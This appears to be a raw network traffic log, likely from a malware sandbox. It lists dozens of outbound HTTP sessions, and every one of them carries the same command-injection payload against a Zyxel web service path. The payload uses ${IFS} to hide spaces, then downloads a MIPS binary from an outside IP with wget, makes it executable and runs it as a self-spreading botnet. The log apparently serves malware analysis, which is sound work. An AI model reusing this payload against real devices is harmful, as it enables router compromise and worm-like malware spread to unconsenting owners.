                                                        Feb 2, 2024 06:21:24.222929955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7882192.168.2.1446430106.27.71.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222953081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7883192.168.2.1452430155.68.158.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.222999096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7884192.168.2.145906647.100.122.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223021984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7885192.168.2.1453528189.205.255.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223078012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7886192.168.2.144221261.112.187.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223114014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7887192.168.2.143873020.218.163.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223150015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7888192.168.2.1452546210.199.152.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223169088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7889192.168.2.1447574221.228.169.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223234892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7890192.168.2.14331662.49.185.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223261118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7891192.168.2.1460692105.24.93.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223297119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7892192.168.2.1437072155.86.232.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223359108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7893192.168.2.14409124.216.177.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223380089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7894192.168.2.1457464184.192.212.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223436117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7895192.168.2.143915837.22.203.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223483086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7896192.168.2.145955686.70.133.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223515987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7897192.168.2.1444892164.87.110.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223563910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7898192.168.2.143842871.148.194.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223589897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7899192.168.2.1444250170.92.187.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223623991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7900192.168.2.1438588212.165.50.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223645926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7901192.168.2.1460690201.9.47.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223671913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7902192.168.2.1440386185.125.178.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223715067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7903192.168.2.1455964164.211.25.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223746061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7904192.168.2.1447440205.67.100.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223804951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7905192.168.2.144789223.215.138.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223829985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7906192.168.2.1453230177.142.219.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223870993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7907192.168.2.144765612.168.106.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223915100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7908192.168.2.1452938156.90.16.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223937035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7909192.168.2.1452004175.208.65.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.223964930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7910192.168.2.143812676.252.151.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224006891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7911192.168.2.1433282161.227.135.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224041939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7912192.168.2.144160237.234.141.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224087954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7913192.168.2.1452594223.203.56.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224114895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7914192.168.2.144822034.13.88.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224189997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7915192.168.2.1437698157.16.161.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224220037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7916192.168.2.144285476.161.10.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224278927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7917192.168.2.143402213.78.148.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224309921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7918192.168.2.1457348172.101.242.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224349976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7919192.168.2.1440232212.172.148.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224384069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7920192.168.2.143898448.13.218.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224446058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7921192.168.2.143675276.179.207.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224479914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7922192.168.2.1440948105.129.26.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224515915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7923192.168.2.144197091.166.225.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224572897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7924192.168.2.14468201.64.64.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224572897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7925192.168.2.143430432.222.150.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224621058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7926192.168.2.144883443.144.65.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224668026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7927192.168.2.1449512152.106.115.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224715948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7928192.168.2.1455346173.226.176.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224776983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7929192.168.2.1460710201.187.64.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224811077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7930192.168.2.1453188129.76.56.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224848986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7931192.168.2.145775619.212.88.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224889994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7932192.168.2.1433936139.177.214.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224927902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7933192.168.2.1437672141.169.174.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.224971056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7934192.168.2.1450680195.157.125.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225013018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7935192.168.2.1437438134.47.123.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225063086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7936192.168.2.1459866132.37.232.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225076914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7937192.168.2.143679649.100.134.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225121975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7938192.168.2.1445506222.42.190.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225145102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7939192.168.2.145991844.27.225.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225168943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7940192.168.2.1438388125.169.12.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225230932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7941192.168.2.145957064.154.220.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225291014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7942192.168.2.1459990101.236.154.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225312948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7943192.168.2.14574664.124.182.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:24.225347042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7944192.168.2.1434950153.136.191.97443
                                                        TimestampBytes transferredDirectionData
